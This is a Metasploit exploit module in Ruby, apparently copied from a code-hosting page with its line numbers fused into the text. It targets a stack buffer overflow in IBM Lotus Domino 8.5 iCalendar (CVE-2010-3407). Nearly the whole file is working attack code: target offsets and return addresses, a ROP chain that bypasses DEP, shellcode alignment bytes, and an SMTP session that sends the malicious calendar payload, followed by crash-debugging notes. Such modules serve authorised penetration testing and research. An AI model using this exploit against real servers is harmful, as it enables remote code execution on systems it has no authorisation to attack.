Path: blob/master/modules/exploits/windows/lotus/domino_icalendar_organizer.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(12update_info(13info,14'Name' => "IBM Lotus Domino iCalendar MAILTO Buffer Overflow",15'Description' => %q{16This module exploits a vulnerability found in IBM Lotus Domino iCalendar. By17sending a long string of data as the "ORGANIZER;mailto" header, process "nRouter.exe"18crashes due to a Cstrcpy() routine in nnotes.dll, which allows remote attackers to19gain arbitrary code execution.2021Note: In order to trigger the vulnerable code path, a valid Domino mailbox account22is needed.23},24'License' => MSF_LICENSE,25'Author' => [26'A. Plaskett', # Initial discovery, poc27'sinn3r' # Metasploit28],29'References' => [30[ 'CVE', '2010-3407' ],31[ 'OSVDB', '68040' ],32[ 'ZDI', '10-177' ],33[ 'URL', 'http://labs.mwrinfosecurity.com/advisories/lotus_domino_ical_stack_buffer_overflow/' ],34[ 'URL', 'http://www-01.ibm.com/support/docview.wss?rs=475&uid=swg21446515' ]35],36'Payload' => {37'BadChars' => [*(0x00..0x08)].pack("C*") + [*(0x10..0x18)].pack("C*") + [*(0x1a..0x1f)].pack("C*") + "\x2c" + [*(0x80..0xff)].pack("C*"),38'EncoderType' => Msf::Encoder::Type::AlphanumMixed,39'EncoderOptions' => { 'BufferRegister' => 'ECX' },40'StackAdjustment' => -350041},42'DefaultOptions' => {43'EXITFUNC' => "process",44},45'Platform' => 'win',46'Targets' => [47[48'Lotus Domino 8.5 on Windows 2000 SP4',49{50'Offset' => 2374, # Offset to EIP51'Ret' => 0x6030582B, # JMP ECX52'MaxBuffer' => 9010 # Total buffer size53}54],55[56'Lotus Domino 8.5 on Windows Server 2003 SP0',57{58'Offset' => 2374, # Offset to EIP59'Ret' => 0x6030582B, # JMP ECX (Domino\\nnotes.dll)60'MaxBuffer' => 9010 # Total buffer size61}62],63[64'Lotus Domino 8.5 on Windows Server 2003 SP2',65{66'Offset' => 2374, # Offset to EIP67'Ret' => 0x604C4222, # ADD AL,0x5E ; RETN68'EAX' => 0x7C35287F, # Initial CALL VirtualProtect addr to align (MSVCR71.dll)69'EaxOffset' => 2342, # Offset to EAX70'RopOffset' => 24, # Offset to ROP gadgets71'MaxBuffer' => 9010 # Total buffer size72}73],74],75'DisclosureDate' => '2010-09-14',76'DefaultTarget' => 2,77'Notes' => {78'Reliability' => UNKNOWN_RELIABILITY,79'Stability' => UNKNOWN_STABILITY,80'SideEffects' => UNKNOWN_SIDE_EFFECTS81}82)83)8485register_options(86[87Opt::RPORT(25),88OptString.new('MAILFROM', [true, 'Valid Lotus Domino mailbox account', '']),89OptString.new('MAILTO', [true, 'Valid Lotus Domino mailbox account', ''])90]91)92end9394def check95connect96banner = (sock.get_once(-1, 5) || '').chomp97disconnect9899if banner =~ /Lotus Domino Release 8\.5/100return Exploit::CheckCode::Appears101else102return Exploit::CheckCode::Safe103end104end105106def exploit107sploit = ''108if target.name =~ /Windows 2000 SP4/109110sploit << rand_text_alpha(934)111sploit << payload.encoded112sploit << rand_text_alpha((target['Offset'] - sploit.length))113sploit << [target.ret].pack('V')114sploit << rand_text_alpha((target['MaxBuffer'] - sploit.length))115116elsif target.name =~ /Server 2003 SP0/117118sploit << rand_text_alpha(930)119sploit << payload.encoded120sploit << rand_text_alpha((target['Offset'] - sploit.length))121sploit << [target.ret].pack('V')122sploit << rand_text_alpha((target['MaxBuffer'] - sploit.length))123124elsif target.name =~ /Server 2003 SP2/125126# Borrow a "CALL VirtualProtect()" in Domino's MSVCR71.dll to bypass DEP127# shellcode max = 1312 bytes128rop_gadgets =129[130# EAX should be aligned to CALL VirtualProtect at this point1310x604F5728, # MOV DWORD PTR DS:[ECX],EAX; RETN (nnotes.dll)132# Set shellcode address1330x6247282B, # MOV EAX,ECX; RETN (nlsccstr.dll)1340x62454F32, # ADD AL,2B; RETN (nlsccstr.dll)1350x603F7B38, # ADD AL,31; RETN (nnotes.dll)1360x624B7040, # MOV DWORD PTR DS:[ECX+4],EAX; RETN (nnotes.dll)137# Set RETN value1380x60577B7A, # XCHG EAX,EDX; RETN (nnotes.dll)1390x62452E35, # MOV EAX,ECX; RETN (nlsccstr.dll)1400x60606F4E, # ADD AL,5D; RETN (nlsccstr.dll)1410x603E6260, # DEC EAX; RETN (nnotes.dll)1420x603E6260, # DEC EAX; RETN (nnotes.dll)1430x603E6260, # DEC EAX; RETN (nnotes.dll)1440x603E6260, # DEC EAX; RETN (nnotes.dll)1450x603E6260, # DEC EAX; RETN (nnotes.dll)1460x7C3A4C72, # MOV DWORD PTR DS:[EAX],EDX; RETN (msvcp71.dll)1470x6247282B, # MOV EAX,ECX; RETN (nlsccstr.dll)1480x60253B6D, # XCHG EAX,EBP; RETN (nnotes.dll)149# Set Size (0x413)1500x605A4B30, # MOV EAX,205; RETN (nnotes.dll)1510x605A4B30, # MOV EAX,205; RETN (nnotes.dll)1520x60592A36, # ADD EAX,107; RETN (nnotes.dll)1530x603B4C27, # ADD AL,2B; RETN (nnotes.dll)1540x624B7044, # MOV DWORD PTR DS:[ECX+8],EAX; RETN1550x604C5225, # XOR EAX, EAX; RETN156# newProtect1570x60386C3C, # MOV AL,3B; RETN (nnotes.dll)1580x624D4C27, # INC EAX; RETN (nlsccstr.dll)1590x624D4C27, # INC EAX; RETN (nlsccstr.dll)1600x624D4C27, # INC EAX; RETN (nlsccstr.dll)1610x624D4C27, # INC EAX; RETN (nlsccstr.dll)1620x624D4C27, # INC EAX; RETN (nlsccstr.dll)1630x624B7048, # MOV DWORD PTR DS:[ECX+C],EAX; RETN164# oldProtect1650x602B7353, # MOV EAX,ESI; POP ESI; RETN (nnotes.dll)1660x41414141, # ESI1670x624B704C, # MOV DWORD PTR DS:[ECX+10],EAX; RETN (nlsccstr.dll)168# Call VirtualProtect1690x6247282B, # MOV EAX,ECX; RETN (nlsccstr.dll)1700x60276256, # XCHG EAX,ESP; RETN (nnotes.dll)171].pack("V*")172173align = "\x51" # PUSH ECX174align << "\x58" # POP EAX175align << "\x34\x43" # XOR AL,43176align << "\x40" # INC EAX177align << "\x34\x65" # XOR AL,65178align << "\x50" # PUSH EAX179align << "\x59" # POP ECX180181sploit << rand_text_alpha(1022)182sploit << align183sploit << payload.encoded184sploit << rand_text_alpha((target['EaxOffset'] - sploit.length))185sploit << [target['EAX']].pack('V')186sploit << rand_text_alpha((target['Offset'] - sploit.length))187sploit << [target.ret].pack('V')188sploit << rand_text_alpha((target['RopOffset']))189sploit << rop_gadgets190sploit << rand_text_alpha((target['MaxBuffer'] - sploit.length))191192end193194fname = rand_text_alpha(4)195prod_id = rand_text_alpha_upper(5) + "@" + rand_text_alpha_upper(13) + "@" + rand_text_alpha_upper(24)196uid = rand_text_alpha_upper(15)197summary = rand_text_alpha_upper(5) + "@" + rand_text_alpha_upper(11)198status = rand_text_alpha_upper(4)199200body = "Content-Type: text/calendar; method=COUNTER; charset=UTF-8\r\n"201body << "#{fname}.txt\r\n"202body << "MIME-Version: 1.0\r\n"203body << "Content-Transfer-Encoding: 8bit\r\n"204body << "BEGIN:VCALENDAR\r\n"205body << "METHOD:COUNTER\r\n"206body << "PRODID:-//#{prod_id}//\r\n"207body << "VERSION:2.0\r\n"208body << "BEGIN:VEVENT\r\n"209body << "UID:#{uid}\r\n"210body << "SEQ:2\r\n"211body << "RRULE:aaaa\r\n"212body << "ORGANIZER:mailto:H@#{sploit}.com\r\n"213body << "ATTENDEE;:Mailto:#{datastore['MAILTO']}\r\n"214body << "SUMMARY:#{summary}\r\n"215body << "DTSTART:20091130T093000Z\r\n"216body << "DTEND:20091130T093000Z\r\n"217body << "DTSTAMP:20091130T083147Z\r\n"218body << "LOCATION:Location\r\n"219body << "STATUS:#{status}\r\n"220body << "END:VEVENT\r\n"221body << "END:VCALENDAR\r\n"222body << "\r\n.\r\n"223224commands =225{226:HELO => "HELO localhost\r\n",227:FROM => "MAIL FROM: <#{datastore['MAILFROM']}>\r\n",228:RCPT => "RCPT TO: <#{datastore['MAILTO']}>\r\n",229:DATA => "DATA\r\n",230:MESG => body,231:QUIT => "QUIT\r\n",232}233234print_status("Trying target #{target.name}")235236connect237238# Get SMTP Banner239res = (sock.get_once || '').chomp240print_status("Banner: #{res}")241242# Check banner before trying the exploit243if res !~ /Lotus Domino Release 8.5/244print_error("Remote service does not seem to be Lotus Domino 8.5")245disconnect246return247end248249# Send HELO250sock.put(commands[:HELO])251res = sock.get_once || ''252print_status("Received: #{res.chomp}")253254# Set MAIL FROM255sock.put(commands[:FROM])256res = sock.get_once || ''257print_status("Received: #{res.chomp}")258259# Set RCPT260sock.put(commands[:RCPT])261res = sock.get_once || ''262print_status("Received: #{res.chomp}")263264# Set DATA265sock.put(commands[:DATA])266res = sock.get_once || ''267print_status("Received: #{res.chomp}")268269# Send malicious data270sock.put(commands[:MESG])271res = sock.get_once272273# QUIT274sock.put(commands[:QUIT])275res = sock.get_once || ''276print_status("Received: #{res.chomp}")277278handler279disconnect280end281end282283=begin2840:008> r285eax=41414141 ebx=00000004 ecx=08da9700 edx=08dab695 esi=06c248bc edi=00000014286eip=42424242 esp=08da9cc0 ebp=41414141 iopl=0 nv up ei pl nz na pe nc287cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=0001020628842424242 ?? ???2890:008> !exchain29008daea2c: nRouter+511bb (004511bb)29108daffdc: kernel32!_except_handler3+0 (77e70abc)292CRT scope 0, filter: kernel32!BaseThreadStart+3a (77e4a92d)293func: kernel32!BaseThreadStart+4b (77e4a943)294Invalid exception stack at ffffffff2950:008> k296ChildEBP RetAddr297WARNING: Frame IP not in any known module. Following frames may be wrong.29808da9cbc 43434343 0x4242424229908da9cc0 43434343 0x43434343300...3010:008> bl3020 e 602738f9 0001 (0001) 0:**** nnotes!MailCheck821Address+0xb093030:008> u 602738f9304nnotes!MailCheck821Address+0xb09:305602738f9 e80239d9ff call nnotes!Cstrcpy (60007200)306602738fe eb02 jmp nnotes!MailCheck821Address+0xb12 (60273902)30760273900 33ff xor edi,edi30860273902 8d8dc0faffff lea ecx,[ebp-540h]30960273908 51 push ecx31060273909 8d95bcf6ffff lea edx,[ebp-944h]3116027390f 52 push edx31260273910 e8eb38d9ff call nnotes!Cstrcpy (60007200)313314Badchars:3150x01=0x0F21, 0x02=0x0f22, 0x03=0x0f23, 0x04=0x0f24, 0x05=0x0f25, 0x06=0x0f26, 0x07=0x0f273160x08=0x0f28, 0x0a=nocrash, 0x0b=0x0f2b, 0x0c=0x0f2c, 0x0d=nocrash, 0x0e=0x0f2e 0x0f=0x0f2f,3170x10=0x0f30, 0x11=0x0f31, 0x12=0x0f32, 0x13=0x0f33, 0x14=0x0f34, 0x15=0x0f35, 0x16=0x0f36,3180x17=0x0f37, 0x18=0x0f38, 0x1a=0x0f3a, 0x1b=0x0f3b, 0x1c=0x0f3c, 0x1d=0x0f3d, 0x1e=0x0f3e,3190x1f=0x0f3f, 0x2c=nocrash, 0x80..0xff = ""320=end321322323